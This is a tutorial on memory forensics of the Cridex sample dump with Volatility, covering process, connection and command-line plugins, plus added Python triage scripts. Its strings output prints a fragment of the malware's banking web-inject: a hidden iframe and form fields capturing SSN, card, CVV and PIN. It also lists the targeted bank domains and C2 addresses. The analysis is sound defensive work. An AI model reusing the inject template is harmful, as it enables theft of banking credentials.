Hello learners, in the first part of our tutorial we learnt how to obtain a volatility memory dump from a computer, which may be either the victim's computer or the computer used to launch an attack. From the acquired memory dump, an investigator can determine the processes that were running on the computer, and from that build solid evidence which can be used against the suspects involved in a lawsuit. In this guide, we will be doing a digital forensic analysis on a volatility memory dump.
Requirements
- Have a memory dump to perform the analysis on. (You can get a sample memory dump from the volatility github repo.)
- Have Kali Linux operating system.
- Have volatility forensic framework installed.
- Have knowledge of digital forensic analysis.
- Have python installed.
With that let’s jump right into our guide.
Installing volatility memory forensic tool.
Step 1: Download volatility from the github repo
Installing the volatility memory forensic tool is as easy as getting it from the official github repo. The framework is built with python. You can download it using the command below.
git clone https://github.com/volatilityfoundation/volatility.git
Step 2: Running volatility.
After the installation is complete, navigate to the volatility folder and run it directly using the command below to check the different options available.
python vol.py -h
When trying to run volatility for the first time, I ran into errors, as shown in the picture below, which you may also run into. You can check for the solution in this post.
Having installed volatility and fixed any errors, we can now dive into forensic volatility memory analysis.
Forensic memory analysis using volatility
Step 1: Getting memory dump OS profile
The imageinfo plugin helps us identify the OS profile of the dump. We add -f to specify the file, which in our case is the memdump, and then name the plugin to run. We cannot start the investigation without knowing the OS profile, because the later plugins need it to interpret the memory image.
$ python2 vol.py -f /your-memdump-location imageinfo
As shown in the image below, we are able to determine the operating system of the memdump under investigation: the suggested profile tells us the PC was running on WinXPSP2x86.
Step 2: Checking the running processes
The pstree plugin in volatility lists the processes that were running as a tree, so it also shows each process's parent.
As shown in the image, we have a suspicious-looking process, “reader_sl.exe”, sitting under the explorer.exe process. After noting this, we can try to check whether there are any hidden processes using the psxview plugin. This plugin is useful because it lists every process, hidden or not, as seen by several different process listing methods. As shown in the image below, we can see that there is a hidden process running.
Step 3: Checking for open connections and the running sockets on the volatility memory dump
After we are done checking the running processes, we can check for the open sockets and connections on the computer. To do this, we will use two plugins: the sockets plugin lists the open sockets, while the connscan plugin scans for TCP connections.
When we check the TCP connections, we note that the process with ID 1484 is connected to the remote addresses 41.168.5.140 and 125.19.103.198 on port 8080. When we check the open sockets using the sockets plugin, we can see that process 1484 has an open TCP socket on port 1038.
Step 4: Checking the commands that were run
We can now check the command lines of the processes on the PC under investigation using the cmdline plugin. Checking these commands can help an investigator while gathering evidence from the volatility memory dump. We will be looking out for process 1484.
└─$ python2 vol.py -f /home/toxic/Desktop/cridex.vmem --profile=WinXPSP2x86 cmdline
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
System pid: 4
************************************************************************
smss.exe pid: 368
Command line : \SystemRoot\System32\smss.exe
************************************************************************
csrss.exe pid: 584
Command line : C:\WINDOWS\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16
************************************************************************
winlogon.exe pid: 608
Command line : winlogon.exe
************************************************************************
services.exe pid: 652
Command line : C:\WINDOWS\system32\services.exe
************************************************************************
lsass.exe pid: 664
Command line : C:\WINDOWS\system32\lsass.exe
************************************************************************
svchost.exe pid: 824
Command line : C:\WINDOWS\system32\svchost -k DcomLaunch
************************************************************************
svchost.exe pid: 908
Command line : C:\WINDOWS\system32\svchost -k rpcss
************************************************************************
svchost.exe pid: 1004
Command line : C:\WINDOWS\System32\svchost.exe -k netsvcs
************************************************************************
svchost.exe pid: 1056
Command line : C:\WINDOWS\system32\svchost.exe -k NetworkService
************************************************************************
svchost.exe pid: 1220
Command line : C:\WINDOWS\system32\svchost.exe -k LocalService
************************************************************************
explorer.exe pid: 1484
Command line : C:\WINDOWS\Explorer.EXE
************************************************************************
spoolsv.exe pid: 1512
Command line : C:\WINDOWS\system32\spoolsv.exe
************************************************************************
reader_sl.exe pid: 1640
Command line : "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
************************************************************************
alg.exe pid: 788
Command line : C:\WINDOWS\System32\alg.exe
************************************************************************
wuauclt.exe pid: 1136
Command line : "C:\WINDOWS\system32\wuauclt.exe" /RunStoreAsComServer Local\[3ec]SUSDSb81eb56fa3105543beb3109274ef8ec1
************************************************************************
wuauclt.exe pid: 1588
Command line : "C:\WINDOWS\system32\wuauclt.exe"
After running the command, we can see that process 1484 is explorer.exe, one of the processes that were running on the PC. Under the explorer.exe process there is “reader_sl.exe”. This looks like a legitimate Adobe Reader component, but it is connecting to an external IP address that looks suspicious. We can export reader_sl.exe from the memory dump with volatility for further analysis.
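To make the correlation done by hand in Steps 3 and 4 repeatable, here is an added Python example; it is not code from the original post or from the Volatility project. It parses cmdline output in the format shown above together with connscan output, joins the two on PID, and reports which process owns each connection to a non-private address. It also flags any process whose name does not match the executable named in its own command line, a quick sanity check against masquerading. The cmdline text embedded in the script is a shortened copy of the output above; the connscan lines are constructed in that plugin's column layout using the PID, remote addresses and local port named in the post, and the local address 172.16.112.128 is an assumption.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Shortened copy of the cmdline plugin output shown in the post (same format).
CMDLINE_OUTPUT = """\
Volatility Foundation Volatility Framework 2.6.1
************************************************************************
System pid: 4
************************************************************************
winlogon.exe pid: 608
Command line : winlogon.exe
************************************************************************
svchost.exe pid: 824
Command line : C:\\WINDOWS\\system32\\svchost -k DcomLaunch
************************************************************************
explorer.exe pid: 1484
Command line : C:\\WINDOWS\\Explorer.EXE
************************************************************************
reader_sl.exe pid: 1640
Command line : "C:\\Program Files\\Adobe\\Reader 9.0\\Reader\\Reader_sl.exe"
************************************************************************
wuauclt.exe pid: 1136
Command line : "C:\\WINDOWS\\system32\\wuauclt.exe" /RunStoreAsComServer Local\\[3ec]SUSDSb81eb56fa3105543beb3109274ef8ec1
"""

# Constructed connscan output: PID, remote endpoints and local port come from the
# post; the local address 172.16.112.128 and the offsets are assumptions.
CONNSCAN_OUTPUT = """\
Volatility Foundation Volatility Framework 2.6.1
Offset(P)  Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ---
0x02087620 172.16.112.128:1038       41.168.5.140:8080         1484
0x023a8008 172.16.112.128:1037       125.19.103.198:8080       1484
"""


@dataclass
class Proc:
    pid: int
    name: str
    cmdline: Optional[str] = None  # None for kernel processes such as System


@dataclass
class Conn:
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int
    pid: int


def parse_cmdline(text: str) -> Dict[int, Proc]:
    """Turn cmdline plugin output into a PID -> Proc map."""
    procs: Dict[int, Proc] = {}
    current: Optional[Proc] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"^(\S+) pid:\s+(\d+)$", line)
        if m:
            current = Proc(pid=int(m.group(2)), name=m.group(1))
            procs[current.pid] = current
        elif line.startswith("Command line :") and current is not None:
            # split on the first colon only; the drive letter colon comes later
            current.cmdline = line.split(":", 1)[1].strip()
    return procs


def parse_connscan(text: str) -> List[Conn]:
    """Turn connscan plugin output into Conn records (header lines are skipped)."""
    rx = re.compile(r"^0x[0-9a-fA-F]+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\d+)$")
    conns = []
    for raw in text.splitlines():
        m = rx.match(raw.strip())
        if m:
            conns.append(Conn(m.group(1), int(m.group(2)), m.group(3), int(m.group(4)), int(m.group(5))))
    return conns


def _image_stem(cmdline: str) -> str:
    """Lower-cased basename (without .exe) of the executable token of a Windows command line."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        exe = cmdline[1:end] if end != -1 else cmdline[1:]
    else:
        exe = cmdline.split(" ", 1)[0]
    stem = re.split(r"[\\/]", exe)[-1].lower()
    return stem[:-4] if stem.endswith(".exe") else stem


def image_mismatches(procs: Dict[int, Proc]) -> List[Tuple[int, str, str]]:
    """Processes whose name differs from the executable in their command line."""
    out = []
    for p in procs.values():
        if p.cmdline and _image_stem(p.cmdline) != _image_stem(p.name):
            out.append((p.pid, p.name, p.cmdline))
    return out


def external_connections(procs: Dict[int, Proc], conns: List[Conn]) -> List[Tuple[str, int, str, int]]:
    """(process name, pid, remote ip, remote port) for every connection to a non-private address."""
    out = []
    for c in conns:
        if ipaddress.ip_address(c.remote_ip).is_global:
            name = procs[c.pid].name if c.pid in procs else "<unknown>"
            out.append((name, c.pid, c.remote_ip, c.remote_port))
    return out


if __name__ == "__main__":
    procs = parse_cmdline(CMDLINE_OUTPUT)
    for name, pid, ip, port in external_connections(procs, parse_connscan(CONNSCAN_OUTPUT)):
        print(f"{name} (pid {pid}) -> {ip}:{port}")
    for pid, name, cmd in image_mismatches(procs):
        print(f"name/image mismatch: pid {pid} {name}: {cmd}")
```

Run as shown, the script attributes both port 8080 connections to explorer.exe (pid 1484), which is the observation the post makes from the connscan and cmdline images. The mismatch check is empty for this sample, as expected; it earns its keep on dumps where a process was started from an executable whose name differs from the process name.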
Step 5: Exporting the reader_sl.exe
In this step we will extract the reader_sl.exe from the volatility memory dump to a folder on our PC. From there, we can perform malware analysis on reader_sl.exe. To export the file we will be using a different plugin, as shown below. The exported file is named after the process ID:
executable.1640.exe
Step 6: Analyzing reader_sl.exe
Having exported the file to be analyzed, we can now analyze it using the available malware analysis tools. How you analyze the file will depend on the kind of information you want to know. Here we use VirusTotal to check whether the file is malicious. The image below shows the report generated by the VirusTotal check.
The file is flagged as malicious. Alternatively, we can extract the process's memory and read through it to see if we can find something of interest relating to our investigation. We can export the memory of the “reader_sl.exe” process from volatility using the command shown below.
After extracting the dump file we can now open it and look for something useful to our investigation using the command:
strings 1640.dmp | less
*treasurypathways.com*
*CorporateAccounts*
*weblink.websterbank.com*
*secure7.onlineaccess1.com*
*trz.tranzact.org*
*onlineaccess1.com*
*secureport.texascapitalbank.com*
*/Authentication/zbf/k/*
*ebc_ebc1961*
*tdbank.com*
*online.ovcb.com*
*ebanking-services.com*
*schwab.com*
*billmelater.com*
*chase.com*
*bankofamerica.com*
*pnc.com*
*suntrust.com*
*wellsfargo.com*
*ibanking-services.com*
*bankonline.umpquabank.com*
*servlet/teller*
*nsbank.com*
*securentry.calbanktrust.com*
*securentry*
*/Common/SignOn/Start.asp*
*telepc.net*
*enterprise2.openbank.com*
*BusinessAppsHome*
*global1.onlinebank.com*
*webexpress*
*/sbuser/*
In another part of the dump, I found the piece below. We can see that the executable is information-stealing malware. It specifically targets banking information.
</div>
<iframe name='wj1' src='https://onlinebanking.tdbank.com/images/TDBankLogo.gif' width='0' height='0' border='none' frameborder='0'></iframe>
<form name="injectform" action="" method="post" target="wj1">
<input type="hidden" name="SSN1" id="ssn1" />
<input type="hidden" name="SSN2" id="ssn2" />
<input type="hidden" name="SSN3" id="ssn3" />
<input type="hidden" name="MMN" id="mmn" />
<input type="hidden" name="DL" id="dl" />
<input type="hidden" name="DOBMM" id="dob_mm" />
<input type="hidden" name="DOBDD" id="dob_dd" />
<input type="hidden" name="DOBYY" id="dob_yy" />
<input type="hidden" name="TDCARD" id="cc" />
<input type="hidden" name="expdate_mm" id="expdate_mm" />
<input type="hidden" name="expdate_yy" id="expdate_yy" />
<input type="hidden" name="cvv" id="cvv"/>
<input type="hidden" name="TDPIN" id="pin" />
</form>
*secure.accurint.com/app/bps/mai*
<input*name="PASSWORD_UL">
<input type="hidden" name="PASSWORD_NC" id="pass_nc">
<form*onSubmit="return prepared_pwd
login_script.js"></script>
<script type="text/javascript">
function prepared_pwd2() {
var df = document.forms[0];
if (df.PASSWORD.value.length < 1) {
if (document.LOGIN && df.APPLICATION_TYPE.value != 'irb') {
build_alert('Enter Password!','Please Enter your Password to Sign On.');
} else {
alert('Please Enter your Password to Login.');
df.PA
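Reading the strings output in less works for one dump, but a watchlist makes this triage step repeatable across many process dumps. The following Python script is an added example, not code from the post or from the Volatility project: it reimplements the printable-run extraction that strings performs and then matches each recovered string against patterns built from the indicators recovered above (wildcarded bank hostnames, the hidden web-inject form fields, the zero-size iframe the form posts into). The byte blob it scans is constructed for this example from a few of the strings recovered above, surrounded by binary filler; a real run would read 1640.dmp from disk instead.

```python
import re
from collections import OrderedDict
from typing import Dict, List

# Constructed stand-in for the process dump (1640.dmp in the post): binary filler
# around a few of the strings recovered from the real dump.
SAMPLE_DUMP = (
    b"\x00\x00\xff\x10MZ\x90\x00"
    b"*chase.com*\x00*bankofamerica.com*\x00"
    b"\x01\x02\x03ab\x00"  # too short to count as a string
    b"<iframe name='wj1' src='https://onlinebanking.tdbank.com/images/TDBankLogo.gif' "
    b"width='0' height='0' border='none' frameborder='0'></iframe>\x00"
    b'<form name="injectform" action="" method="post" target="wj1">\x00'
    b'<input type="hidden" name="TDCARD" id="cc" />\x00'
    b'<input type="hidden" name="cvv" id="cvv"/>\x00'
    b"just an ordinary string with nothing of interest\x00"
)

# Patterns derived from the indicators in the post's strings output.
WATCHLIST = OrderedDict([
    # wildcarded bank hostnames, as they appear in the malware's target list
    ("banking_domain", re.compile(
        r"(?i)\b(chase|bankofamerica|wellsfargo|tdbank|schwab|pnc|suntrust|onlineaccess1)\.com\b")),
    # web-inject form template with hidden fields for SSN / card / PIN data
    ("form_inject", re.compile(
        r'(?i)name="injectform"|type="hidden"\s+name="(SSN\d|MMN|DL|DOB\w+|TDCARD|TDPIN|cvv|expdate_\w+)"')),
    # zero-size iframe that the injected form posts into
    ("hidden_iframe", re.compile(r"(?i)<iframe[^>]*width='0'[^>]*height='0'")),
])


def extract_strings(data: bytes, min_len: int = 6) -> List[str]:
    """Same idea as strings(1): every run of at least min_len printable ASCII bytes."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def triage(data: bytes, min_len: int = 6) -> Dict[str, List[str]]:
    """Map each watchlist category to the distinct strings that matched it, in dump order."""
    hits: Dict[str, List[str]] = {cat: [] for cat in WATCHLIST}
    for s in extract_strings(data, min_len):
        for cat, rx in WATCHLIST.items():
            if rx.search(s) and s not in hits[cat]:
                hits[cat].append(s)
    return hits


if __name__ == "__main__":
    # To run against a real extracted dump: data = open("1640.dmp", "rb").read()
    for cat, strings in triage(SAMPLE_DUMP).items():
        print(f"[{cat}] {len(strings)} hit(s)")
        for s in strings:
            print("   ", s[:100])
```

The minimum length of six mirrors a typical strings run; lowering it recovers more fragments at the cost of noise. Because the patterns are anchored on what was actually recovered from this dump, the same script can be pointed at other process dumps from the same image to see which of them carry the same target list or inject template.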
Conclusion
In the guide above, we were able to perform a volatility memory analysis to gather information from a victim computer, as shown in our findings. We were able to discover malware which had camouflaged itself as a process familiar to the user. This is one of the common methods used by attackers when stealing information.
Volatility memory analysis is a powerful skill to add to an investigator's arsenal. The volatility framework is extensive and helps investigators perform forensic analysis efficiently. The framework is available for the common operating systems.
References
Volatility memory dump samples
Mnemonic PassiveDNS
Cridex writeup
Hybrid-Analysis